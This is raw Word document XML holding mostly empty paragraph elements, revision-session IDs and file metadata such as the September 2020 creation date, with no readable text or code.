    <w:p w14:paraId="662A6F2E" w14:textId="04F81633" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F"/>
    <w:p w14:paraId="3C7857E0" w14:textId="6FD012CD" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F"/>
    <w:p w14:paraId="1C6E27EE" w14:textId="48FE86D7" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F"/>
    <w:p w14:paraId="6787B47A" w14:textId="5C23AC5F" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F"/>
    <w:p w14:paraId="5F98A29C" w14:textId="7DA31C4D" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F"/>
    <w:p w14:paraId="7581A9CF" w14:textId="0A5C6383" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F"/>
    <w:p w14:paraId="15624F11" w14:textId="777FF4AC" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F"/>
    <w:p w14:paraId="02DA5EDA" w14:textId="0E75881F" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F"/>
    <w:p w14:paraId="4DF3C636" w14:textId="77777777" w:rsidR="00FB5A5F" w:rsidRDefault="00FB5A5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E766C46" w14:textId="17D3F391" w:rsidR="002A0A00" w:rsidRDefault="002A0A00"/>
    <w:p w14:paraId="3B76B316" w14:textId="41797807" w:rsidR="002A0A00" w:rsidRDefault="002A0A00"/>
    <w:p w14:paraId="329FF30C" w14:textId="3D3BDD17" w:rsidR="002A0A00" w:rsidRDefault="002A0A00"/>
    <w:p w14:paraId="3C9D8B01" w14:textId="02EA826E" w:rsidR="002A0A00" w:rsidRDefault="002A0A00"/>
    <w:p w14:paraId="799A5A00" w14:textId="317B9A01" w:rsidR="002A0A00" w:rsidRDefault="002A0A00"/>
    <w:p w14:paraId="6DCFE769" w14:textId="5BED992F" w:rsidR="002A0A00" w:rsidRDefault="002A0A00"/>
    <w:p w14:paraId="451A8B99" w14:textId="266A3929" w:rsidR="002A0A00" w:rsidRDefault="002A0A00"/>
    <w:p w14:paraId="541FA5CC" w14:textId="5D285D06" w:rsidR="002A0A00" w:rsidRDefault="002A0A00"/>
    <w:p w14:paraId="708587D1" w14:textId="4DB8588F" w:rsidR="002A0A00" w:rsidRDefault="002A0A00"/>
    <w:p w14:paraId="342A34B3" w14:textId="52348D32" w:rsidR="002A0A00" w:rsidRDefault="002A0A00"/>
    <w:p w14:paraId="45198CA8" w14:textId="0035EC8A" w:rsidR="002A0A00" w:rsidRDefault="002A0A00"/>
    <w:p w14:paraId="2FC02600" w14:textId="797EACDC" w:rsidR="002A0A00" w:rsidRDefault="002A0A00"/>
    <w:p w14:paraId="0BBA5A81" w14:textId="072EAD9B" w:rsidR="002A0A00" w:rsidRDefault="002A0A00"/>
    <w:p w14:paraId="24C6C344" w14:textId="783DC4C4" w:rsidR="002A0A00" w:rsidRDefault="002A0A00"/>
    <w:p w14:paraId="74B294D4" w14:textId="02046C26" w:rsidR="002A0A00" w:rsidRDefault="002A0A00"/>
    <w:p w14:paraId="7EB5AD44" w14:textId="1AC50424" w:rsidR="002A0A00" w:rsidRDefault="002A0A00"/>
    <w:p w14:paraId="133C9BFE" w14:textId="17391A9F" w:rsidR="002A0A00" w:rsidRDefault="002A0A00"/>
    <w:p w14:paraId="04BEF3D9" w14:textId="2C9D7425" w:rsidR="002A0A00" w:rsidRDefault="002A0A00"/>
    <w:p w14:paraId="2F7D7EA4" w14:textId="7C703330" w:rsidR="002A0A00" w:rsidRDefault="002A0A00"/>
    <w:p w14:paraId="7768C1EE" w14:textId="08E4AD4B" w:rsidR="002A0A00" w:rsidRDefault="002A0A00"/>
    <w:p w14:paraId="47D8C407" w14:textId="77777777" w:rsidR="002A0A00" w:rsidRDefault="002A0A00">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16A3C0C9" w14:textId="2327AA2D" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="43B83AF1" w14:textId="0DBA0B0B" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="35465028" w14:textId="657DD9FB" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="28206F04" w14:textId="7F4FB774" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="303DD687" w14:textId="4F5BB669" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="0C71AAEC" w14:textId="7FB6CBDD" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="22B7DCF7" w14:textId="02A4B6FE" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="040CD7CA" w14:textId="7BBF059F" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="6A47A028" w14:textId="58D815BE" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="74C6F37C" w14:textId="0F77D79B" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="03971D05" w14:textId="5740F5C6" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="7221862B" w14:textId="0B250647" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="266E7F93" w14:textId="78210390" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="2592B15C" w14:textId="07AAEE9E" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="4390CEDB" w14:textId="255C8EE3" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="6AE26072" w14:textId="099AE848" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="16CDD72B" w14:textId="71C44B42" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="12881D7D" w14:textId="0ADFF74A" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="4D1E922C" w14:textId="28DA75FB" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="5FECE969" w14:textId="1EC34913" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="44D70EE8" w14:textId="0963AC2E" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="4FD128A4" w14:textId="261103CE" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="75CBC2B6" w14:textId="24F9A7E5" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="18AAC5B3" w14:textId="6A6F1EC5" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="43FC54FE" w14:textId="42555D8E" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="5FF2DCC9" w14:textId="030D00D0" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="24E4CD5B" w14:textId="78A6F2D3" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="37BE8688" w14:textId="233BEF3E" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="4D55DD36" w14:textId="72144997" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="0F58120E" w14:textId="40B961A7" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="22E410D9" w14:textId="22670BC2" w:rsidR="00C478E6" w:rsidRDefault="00C478E6"/>
    <w:p w14:paraId="663ACA6C" w14:textId="77777777" w:rsidR="00C478E6" w:rsidRDefault="00C478E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CF17CEA" w14:textId="2B884C3F" w:rsidR="00141302" w:rsidRDefault="00141302"/>
    <w:p w14:paraId="61D8ED93" w14:textId="6E75A603" w:rsidR="00141302" w:rsidRPr="00141302" w:rsidRDefault="00141302">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00141302" w:rsidRPr="001413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574"/>
    <w:rsid w:val="00141302"/>
    <w:rsid w:val="002A0A00"/>
    <w:rsid w:val="00366171"/>
    <w:rsid w:val="003A72CC"/>
    <w:rsid w:val="004F45A1"/>
    <w:rsid w:val="00592B94"/>
    <w:rsid w:val="005E5BEE"/>
    <w:rsid w:val="007E4922"/>
    <w:rsid w:val="008410DD"/>
    <w:rsid w:val="00851804"/>
    <w:rsid w:val="009A6574"/>
    <w:rsid w:val="00A25961"/>
    <w:rsid w:val="00C22429"/>
    <w:rsid w:val="00C30B4B"/>
    <w:rsid w:val="00C478E6"/>
    <w:rsid w:val="00CE2DCB"/>
    <w:rsid w:val="00DC5BE4"/>
    <w:rsid w:val="00E204EE"/>
    <w:rsid w:val="00E60991"/>
    <w:rsid w:val="00F07DF4"/>
    <w:rsid w:val="00FB5A5F"/>
    <w:rsid w:val="00FC178D"/>
    <w:rsid w:val="00FD1763"/>
    <w:rsid w:val="00FF5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441A8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CED35888-B3F1-4199-BE40-C3F8B3C8B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74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7</Pages>
  <Words>526</Words>
  <Characters>3003</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>25</Lines>
  <Paragraphs>7</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3522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13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-05T04:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-05T13:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>